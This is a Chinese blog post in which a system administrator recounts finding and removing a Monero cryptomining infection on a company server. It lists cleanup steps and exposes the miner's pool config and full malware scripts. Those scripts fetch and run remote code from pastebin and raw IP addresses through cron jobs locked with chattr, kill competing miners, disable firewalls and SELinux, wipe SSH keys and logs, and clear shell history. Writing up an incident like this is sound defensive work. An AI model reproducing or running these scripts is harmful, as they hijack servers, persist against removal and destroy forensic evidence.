zoukankan      html  css  js  c++  java
  • 挖矿病毒排查

      公司服务器负载突然上来了,用top命令查看,发现了一个很诡异的进程;

      然后grep这个进程的进程号,发现是运行在/tmp/.solr/solrd下;于是赶紧杀进程,删程序,负载就下来了;但是还没有完,用top命令再次查看的时候惊奇的发现有一个solr.sh的脚本在执行,通过grep它的进程号,发现还是运行在tmp下,但是奇怪的是明明脚本在运行,但是在对应路径下找不到该脚本,用find全局查找也找不到;为了不让其继续作恶,赶紧把进程杀了,在阿里云控制台添加了安全组,只允许80,443的请求进来;

     

      这还没有完,过一会,solr.sh脚本又开始运行了,但是正主solrd却没有运行;因该是由于端口限制程序包进不来了;于是赶紧做了如下措施:

    1、修改服务器密码;
    2、检查/etc/passwd、/etc/group文件有没有不熟悉的用户;
    3、检查计划任务,这一查不要紧,还真有东西;但是清除计划任务时,发现没有权限,我可是root啊,开玩笑没有权限;于是检查了特殊权限,发现还真有,一个个清除了,又检查了/etc/cron.d/、/etc/cron.daily/、/etc/cron.deny、/etc/cron.hourly/、/etc/cron.monthly/、/etc/crontab、/etc/cron.weekly/无一例外,都有计划任务,还都加了特殊权限;

    [root@jira-wiki log]# crontab -l
    */10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash
    [root@jira-wiki log]# crontab -r
    /var/spool/cron/root: Operation not permitted
    [root@jira-wiki log]# lsattr /var/spool/cron/
    ----ia-------e-- /var/spool/cron/root
    [root@jira-wiki log]# chattr -ia /var/spool/cron/root
    [root@jira-wiki log]# lsattr /var/spool/cron/
    -------------e-- /var/spool/cron/root
    [root@jira-wiki log]# chattr -e /var/spool/cron/root
    [root@jira-wiki log]# lsattr /var/spool/cron/
    ---------------- /var/spool/cron/root
    [root@jira-wiki log]#

    4、用last查看最近登录的用户;
    5、分析/var/log/messages、/var/log/secure日志

    6、将chattr命令mv到其他地方,并修改名称,位置只有管理员知道,并将/var/log/wtmp、/var/log/secure、/var/log/cronrot加-a特殊权限,否则这些日志被清理后很恶心;最后一定要清除mv chattr命令的痕迹别让不法分子知道了你把chattr命令移动道理哪;

      当时把它的程序copy了一份,事后看了下其配置文件,其中有这么一段配置,访问了下网址,发现是个叫门罗币的矿池;百度了下,发现中招的人还不少;

        "pools": [
            {
                "algo": null,
                "coin": null,
                "url": "pool.supportxmr.com:80",
                "user": "4APyW6eriFEHcp4jVaGLP7eUVMV332fdrKn5iEqHcPjQMy1giyzy9phM2GrFYJ87eNEXJi3CqTaJYbfBVQWS22ke9ke9oVB",
                "pass": "x",
                "rig-id": null,
                "nicehash": false,
                "keepalive": false,
                "enabled": true,
                "tls": false,
                "tls-fingerprint": null,
                "daemon": false,
                "socks5": null,
                "self-select": null
            }
        ],

     最后我贴一下天杀的挖矿病毒在我服务器上干了啥,曝光它:

    #!/bin/sh
    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
    ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'dbuse' | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
    killall /tmp/*
    killall /tmp/.*
    killall /var/tmp/*
    killall /var/tmp/.*
    pgrep JavaUpdate | xargs -I % kill -9 %
    pgrep kinsing | xargs -I % kill -9 %
    pgrep donate | xargs -I % kill -9 %
    pgrep kdevtmpfsi | xargs -I % kill -9 %
    pgrep sysupdate | xargs -I % kill -9 %
    pgrep mysqlserver | xargs -I % kill -9 %
    chattr -ia /var/spool/cron/root
    crontab -r
    crontab -l | grep -e "T6hvUyQq" | grep -v grep
    if [ $? -eq 0 ]; then
      echo "cron good"
    else
      (
        crontab -l 2>/dev/null
        echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/T6hvUyQq | sh"
      ) | crontab -
    fi
    rm -f /tmp/*
    rm -f /tmp/.sola
    s2=`whoami`
    if [ `whoami` = "root" ];
    then
        chattr -ia /etc/cron.d/*
        rm -rf /etc/cron.d/*
        chattr -i /var/spool/cron/crontabs/root
        chattr -i /usr/local/bin/dns
        rm -f /etc/cron.hourly/oanacroner
        rm -f /etc/cron.hourly/oanacrona
        rm -f /etc/cron.daily/oanacroner
        rm -f /etc/cron.daily/oanacrona
        rm -f /etc/cron.monthly/oanacroner
        rm -f /usr/local/bin/dns
        rm -f /etc/update.sh
        chattr -ia /etc/hosts
        echo >/etc/hosts
        chattr +ia /etc/hosts
        chattr -i /etc/sysupdate
        rm -f /etc/sysupdate
        rm -f /etc/config.json
        rm -f /var/tmp/kworkerds
        rm -f /usr/bin/.systemcero
        rm -f /usr/bin/cloudupdate
        rm -f /usr/bin/diskmanagerd
        rm -f /lib/libterminfo.so
        rm -f /bin/httpsntp
        rm -f /bin/ftpsntp
        rm -f /var/tmp/jspserv
        rm -f /usr/sbin/cron
        rm -f /usr/bin/kinsing*
        rm -f /etc/cron.d/kinsing*
        rm -f /usr/bin/node
        chattr -isa /var/spool/cron/*
        rm -rf /var/spool/cron/*
        chattr +isa /tmp/xms
        rm -f /var/tmp/kinsing
        chattr -ia /etc/crontab
        echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xsC5mrCe | sh' > /etc/crontab
        chattr +ia /etc/crontab
        chattr -ia /var/spool/cron/root
        chattr -ia /var/spool/cron/crontabs/root
        echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash' >/var/spool/cron/root
        echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash' >/var/spool/cron/crontabs/root
        echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xsC5mrCe | sh' > /etc/cron.d/root
        chattr +ia /var/spool/cron/root
        chattr +ia /etc/cron.d/root
        chattr +ia /var/spool/cron/crontabs/root
    else
        ps aux | grep -v 'java|redis|weblogic|mongod|mysql|oracle|tomcat|grep|postgres|atlassian|awk|sbin|WebLogic.sh|solr|server|aux|httpd|sh|sbin|' | grep ${s2:0:7} | awk '{print $2}' | xargs -I % kill -9 %
        ps aux | grep -v 'java|redis|weblogic|mongod|mysql|oracle|tomcat|grep|postgres|atlassian|awk|sbin|WebLogic.sh|solr|server|aux|httpd|sh|defunct|sbin|' | grep $s2 | awk '{print $2}' | xargs -I % kill -9 %
    fi
    chmod +777 /tmp/*
    pkill networkservice
    pkill networkser+
    pkill watchbog
    pkill xmrig
    p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}')
    name=""$p
    if [ -z "$name" ]
    then
        pkill solr.sh
        pkill solrd
        ps aux | grep -v grep | grep -v 'java|redis|mongod|mysql|oracle|tomcat|grep|postgres|confluence|awk|aux|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 %
        chmod +rwx /tmp/.solr
        rm -rf /tmp/.solr
        mkdir /tmp/.solr
        curl -fsSL http://27.1.1.34:8080/docs/s/config.json -o /tmp/.solr/config.json
        curl -fsSL http://222.122.47.27:2143/auth/solrd.exe -o /tmp/.solr/solrd
        curl -fsSL http://27.1.1.34:8080/docs/s/solr.sh -o /tmp/.solr/solr.sh
        chmod +x /tmp/.solr/solrd
        chmod +x /tmp/.solr/solr.sh
        nohup /tmp/.solr/solr.sh &>>/dev/null &
        sleep 10
        rm -f /tmp/.solr/solr.sh
    else
        exit
    fi
    #!/bin/bash
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    
    setenforce 0 2>/dev/null
    ulimit -n 65535
    ufw disable
    iptables -P INPUT ACCEPT
    iptables -P OUTPUT ACCEPT
    iptables -P FORWARD ACCEPT
    iptables -F
    echo "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.conf
    sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
    echo '0' >/proc/sys/kernel/nmi_watchdog
    echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
    mv /usr/bin/ps.original /usr/bin/ps
    netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %
    netstat -antp | grep '23.94.24.12'  | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 %
    netstat -antp | grep '134.122.17.13'  | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 %
    netstat -antp | grep '66.70.218.40'  | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 %
    netstat -antp | grep '209.141.35.17'  | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 %
    echo "123"
    netstat -antp | grep '119.28.4.91'  | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 %
    netstat -antp | grep '101.32.73.178'  | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 %
    netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk  -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    ps -fe | grep -v '.rsyslogds' | grep '/tmp' | grep -v grep  | awk '{print $2}' | sed -e 's//.*//g' | xargs -I % kill -9 %
    if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
    if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
    if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
    if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
    echo $DLB
    if [ -w /usr/sbin ]; then
      SPATH=/usr/sbin
    else
      SPATH=/tmp
    fi
    ipurl="http://107.172.214.23:1234"
    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;/tmp/.rsyslogds;chattr +ai $SPATH/.rsyslogds
    $DLB $SPATH/.inis $ipurl/.inis;chmod +x $SPATH/.inis
    cd $SPATH/
    nohup ./.inis 1>/dev/null 2>&1 &
    chattr +ia $SPATH/.inis
    history -c
    echo 0>/root/.ssh/authorized_keys
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cronrot
    echo 0>~/.bash_history
  • 相关阅读:
    centos7系统初始化脚本
    git上传项目到github
    requests的使用
    zip函数
    mongodb基本操作
    mongodb的安装与配置启动(转)
    jupyter插件与主题
    map函数
    centos7 安装 ffmpeg
    centos7 下 yum 安装Nginx
  • 原文地址:https://www.cnblogs.com/zhangzhide/p/15223446.html
Copyright © 2011-2022 走看看